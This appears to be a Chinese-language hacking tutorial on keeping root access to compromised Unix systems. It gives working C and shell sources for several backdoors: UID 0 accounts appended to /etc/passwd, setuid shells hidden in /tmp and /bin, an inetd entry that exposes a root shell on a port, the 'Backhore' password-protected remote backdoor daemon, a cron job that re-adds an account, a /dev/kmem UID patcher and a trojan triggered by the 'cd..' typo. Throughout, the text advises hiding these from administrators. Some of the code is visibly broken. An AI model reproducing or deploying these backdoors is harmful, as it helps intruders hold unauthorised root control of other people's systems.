最簡單的方法,就是在口令文件 passwd 中增加一個 UID 為 0 的帳號。但最好別這么做,因為只要系統管理員檢查口令文件就會“漏餡”了。以下是在 /etc/passwd 口令文件中添加一個 UID 0 帳號的C程序。
<++> backdoor/backdoor1.c
#include
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/root:/bin/sh\n");
}
<-->
比這種方法稍微隱蔽一點的就是將藏在口令文件中某個無人使用帳號的 UID 改為 0,并將其第二個域(口令域)設為空。(注意,如果你使用的是較高版本的*nix,也許還要修改 /etc/shadow 文件。)
在 /tmp 目錄下放置 suid shell。以后只要你運行這個程序,就會輕易得到根用戶權限。這種方法幾乎是最受歡迎的了。但有許多系統每幾小時,或者每次啟動都會清除 /tmp 目錄下的數據,另外一些系統則根本不允許運行 /tmp 目錄下的 suid 程序。當然,你可以自己修改或清除這些限制(因為你已是根用戶,有權限修改 /var/spool/cron/crontabs/root 和 /etc/fstab 文件)。以下是在 /tmp 目錄下放置 suid shell 程序的C源程序。
<++> backdoor/backdoor2.c
#include
main()
{
system("cp /bin/sh /tmp/fid");
system("chown root.root /tmp/fid");
system("chmod 4755 /tmp/fid");
}
<-->
[中級]
超級服務器守護進程(inetd)的配置文件。系統管理員一般情況下不經常檢查該文件,因此這倒是個放置“后門”的好地方。:) 那么在這里如何建立一個最好的后門呢?當然是遠程的了。這樣你就不必需要本地帳號就可以成為根用戶了。首先,讓我們先來了解一下這方面的基礎知識:inetd 進程負責監聽各個TCP和UDP端口的連接請求,并根據連接請求啟動相應的服務器進程。該配置文件 /etc/inetd.conf 很簡單,基本形式如下:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
mountd/1 stream rpc/tcp wait root /usr/etc/mountd mountd
1:第一欄是服務名稱。服務名通過查詢 /etc/services 文件(供 TCP 和 UDP 服務使用)或 portmap 守護進程(供 RPC 服務使用)映射成端口號。RPC(遠程過程調用)服務由 name/num 的名字格式和第三欄中的 rpc 標志識別。
2:第二欄決定服務使用的套接口類型:stream、dgram 或 raw。一般說來,stream 用于 TCP 服務,dgram 用于 UDP, raw 的使用很少見。
3:第三欄標識服務使用的通信協議。允許的類型列在 protocols 文件中。協議幾乎總是是 tcp 或 udp。RPC 服務在協議類型前冠以 rpc/。
4:如果所說明的服務一次可處理多個請求(而不是處理一個請求后就退出),那么第四欄應置成 wait,這樣可以阻止 inetd 持續地派生該守護進程的新拷貝。此選項用于處理大量的小請求的服務。如果 wait 不合適,那么在本欄中填 nowait。
5:第五欄給出運行守護進程的用戶名。
6:第六欄給出守護進程的全限定路徑名。
7:守護進程的真實名字及其參數。
如果所要處理的工作微不足道(如不需要用戶交互),inetd 守護進程便自己處理。此時第六、七欄只需填上 'internal' 即可。所以,要安裝一個便利的后門,可以選擇一個不常被使用的服務,用可以產生某種后門的守護進程代替原先的守護進程。例如,讓其添加 UID 0 的帳號,或復制一個 suid shell。
一個比較好的方法之一,就是將用于提供日期時間的服務 daytime 替換為能夠產生一個 suid root 的 shell。只要將 /etc/inetd.conf 文件中的:
daytime stream tcp nowait root internal
修改為:
daytime stream tcp nowait /bin/sh sh -i.
然后重啟(記住:一定要重啟)inetd 進程:
killall -9 inetd。
但更好、更隱蔽的方法是偽造網絡服務,讓它能夠在更難以察覺的情況下為我們提供后門,例如口令保護等。如果能夠在不通過 telnetd 連接的情況下輕松地進行遠程訪問,那是再好不過了。方法就是將“自己的”守護程序綁定到某個端口,該程序對外來連接不提供任何提示符,但只要直接輸入了正確的口令,就能夠順利地進入系統。以下是這種后門的一個示范程序。(注:這個程序寫得并不很完整。)
<++> backdoor/remoteback.c
/* Coders:
Theft
Help from:
Sector9, Halogen
Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle,halogen,
Psionic, g0d, Psionic.
Groups: Ethical Mutiny Crew(EMC), Common Purpose hackers(CPH),
Global Hell(gH), Team Sploit, Hong Kong Danger Duo,
Tg0d, EHAP.
Usage:
Setup:
# gcc -o backhore backhore.c # ./backdoor password &
Run:
Telnet to the host on port 4000. After connected you
Will not be prompted for a password, this way it is less
Obvious, just type the password and press enter, after this
You will be prompted for a command, pick 1-8.
Distributers:
Ethical Mutiny Crew
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 4000
#define MAXDATASIZE 100
#define BACKLOG 10
#define SA struct sockaddr
void handle(int);
int
main(int argc, char *argv[])
{
int sockfd, new_fd, sin_size, numbytes, cmd;
char ask[10]="Command: ";
char *bytes, *buf, pass[40];
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
printf("\n Backhore BETA by Theft\n");
printf(" 1: trojans rc.local\n");
printf(" 2: sends a systemwide message\n");
printf(" 3: binds a root shell on port 2000\n");
printf(" 4: creates suid sh in /tmp\n");
printf(" 5: creates mutiny account uid 0 no passwd\n");
printf(" 6: drops to suid shell\n");
printf(" 7: information on backhore\n");
printf(" 8: contact\n");
if (argc != 2) {
fprintf(stderr,"Usage: %s password\n", argv[0]);
exit(1);
}
strncpy(pass, argv[1], 40);
printf("..using password: %s..\n", pass);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(PORT);
my_addr.sin_addr.s_addr = INADDR_ANY;
if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) {
perror("bind");
exit(1);
}
if (listen(sockfd, BACKLOG) == -1) {
perror("listen");
exit(1);
}
sin_size = sizeof(SA);
while(1) { /* main accept() loop */
if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) {
perror("accept");
continue;
}
if (!fork()) {
dup2(new_fd, 0);
dup2(new_fd, 1);
dup2(new_fd, 2);
fgets(buf, 40, stdin);
if (!strcmp(buf, pass)) {
printf("%s", ask);
cmd = getchar();
handle(cmd);
}
close(new_fd);
exit(0);
}
close(new_fd);
while(waitpid(-1,NULL,WNOHANG) > 0); /* rape the dying children */
}
}
void
handle(int cmd)
{
FILE *fd;
switch(cmd) {
case '1':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("Trojaning rc.local\n");
fd = fopen("/etc/passwd", "a+");
fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh");
fclose(fd);
printf("Trojan complete.\n");
break;
case '2':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("Sending systemwide message..\n");
system("wall Box owned via the Ethical Mutiny Crew");
printf("Message sent.\n");
break;
case '3':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("\nAdding inetd backdoor... (-p)\n");
fd = fopen("/etc/services","a+");
fprintf(fd,"backdoor\t2000/tcp\tbackdoor\n");
fd = fopen("/etc/inetd.conf","a+");
fprintf(fd,"backdoor\tstream\ttcp\tnowait\troot\t/bin/sh -i\n");
execl("killall", "-HUP", "inetd", NULL);
printf("\ndone.\n");
printf("telnet to port 2000\n\n");
break;
case '4':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("\nAdding Suid Shell... (-s)\n");
system("cp /bin/sh /tmp/.sh");
system("chmod 4700 /tmp/.sh");
system("chown root:root /tmp/.sh");
printf("\nSuid shell added.\n");
printf("execute /tmp/.sh\n\n");
break;
case '5':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("\nAdding root account... (-u)\n");
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/:/bin/bash\n");
printf("\ndone.\n");
printf("uid 0 and gid 0 account added\n\n");
break;
case '6':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("Executing suid shell..\n");
execl("/bin/sh");
break;
case '7':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("\nInfo... (-i)\n");
printf("\n3 - Adds entries to /etc/services & /etc/inetd.conf giving you\n");
printf("a root shell on port 2000. example: telnet 2000\n\n");
printf("4 - Creates a copy of /bin/sh to /tmp/.sh which, whenever\n");
printf("executed gives you a root shell. example:/tmp/.sh\n\n");
printf("5 - Adds an account with uid and gid 0 to the passwd file.\n");
printf("The login is 'mutiny' and there is no passwd.");
break;
case '8':
printf("\nBackhore BETA by Theft\n");
printf("\nhttp://theft.bored.org\n");
printf("theft@cyberspace.org\n\n");
break;
default:
printf("unknown command: %d\n", cmd);
break;
}
}
<-->
[高級]
Crontab 程序對于系統管理員來說是非常有用的。Cron 服務用于計劃程序在特定時間(月、日、周、時、分)運行。如果你足夠聰明,就應該加以利用,使之為我們制造“后門”!通過 Cron 服務,你可以讓它在每天凌晨 3:00 (這個時候網管應該睡覺了吧。)運行后門程序,使你能夠輕易進入系統干你想干的事,并在網管起來之前退出系統。根用戶的 crontab 文件放在 /var/spool/crontab/root 中,其格式如下:
(1) (2) (3) (4) (5) (6)
0 0 * * 3 /usr/bin/updatedb
1. 分鐘 (0-60)
2. 小時 (0-23)
3. 日 (1-31)
4. 月 (1-12)
5. 星期 (1-7)
6. 所要運行的程序
以上內容設置該程序于每星期三 0:0 運行。要在 cron 建立后門,只需在 /var/spool/crontab/root 中添加后門程序即可。例如該程序可以在每天檢查我們在 /etc/passwd 文件中增加了用戶帳號是否仍然有效。以下是程序示例:
0 0 * * * /usr/bin/retract
<++> backdoor/backdoor.sh
#!/bin/csh
set evilflag = (`grep eviluser /etc/passwd`)
if($#evilflag == 0) then
set linecount = `wc -l /etc/passwd`
cd
cp /etc/passwd ./temppass
@ linecount[1] /= 2
@ linecount[1] += 1
split -$linecount[1] ./temppass
echo "Meb::0:0:Meb:/root:/bin/sh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd
rm ./xa* ./temppass
echo Done...
else
endif
<-->
[綜合]
當然,我們可以編寫木馬程序,并把它放到 /bin 目錄下。當以特定命令行參數運行時將產生一個 suid shell。以下是程序示例:
<++> backdoor/backdoor3.c
#include
#define pass "triad"
#define BUFFERSIZE 6
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){
if(!(strcmp(pass,argv[1]))){
system("cp /bin/csh /bin/.swp121");
system("chmod 4755 /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
printf("372f: Invalid control argument, unable to initialize. Retrying");
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nAction aborted after 10 attempts.\n");
return(0);
}
<-->
[變種]
以下程序通過在內存中尋找你所運行程序的 UID,并將其改為 0,這樣你就有了一個 suid root shell 了。
<++> backdoor/kmemthief.c
#include
#include
#include
#include
#include
#include
#include
#define pass "triad"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){
if(!(strcmp(pass,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to
/dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
}
<-->
[“笨”方法]
你有沒有曾經試過在 UNIX 系統下錯把 "cd .." 輸入為 "cd.."?這是由于使用 MS Windows 和 MS-DOS 養成的習慣。這種錯誤網管是否也會犯呢?如果是這樣的話,可不可以讓他為我們做點“貢獻”呢?:) 例如當他輸入 "cd.." 時,會激活我們的木馬程序。這樣我們就不必登錄到系統去激活木馬了。以下是程序示例:
<++> backdoor/dumb.c
/*
本程序可在管理員偶然地輸入 cd.. 時向 /etc/passwd 文件添加一個 UID 0 帳號。但同時它也實現 cd .. 功能,從而騙過管理員。
*/
#include
#include
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/root:/bin/sh\n");
system("cd");
}
<-->
把上面的程序編譯好,放到隱蔽的地方。最好使用 chown 命令將該程序的屬主改為 root,使管理員使用 "ls -alF" 命令看到 suid 程序時不至于懷疑。
好了,將這個程序(假設其名為 fid)放好以后,下一步的工作就是建立該程序到 "cd.." 的鏈接:ln cd.. /bin/out。這樣,只要系統管理員犯了這個輸入錯誤,你就可以又一次得到系統控制權了。
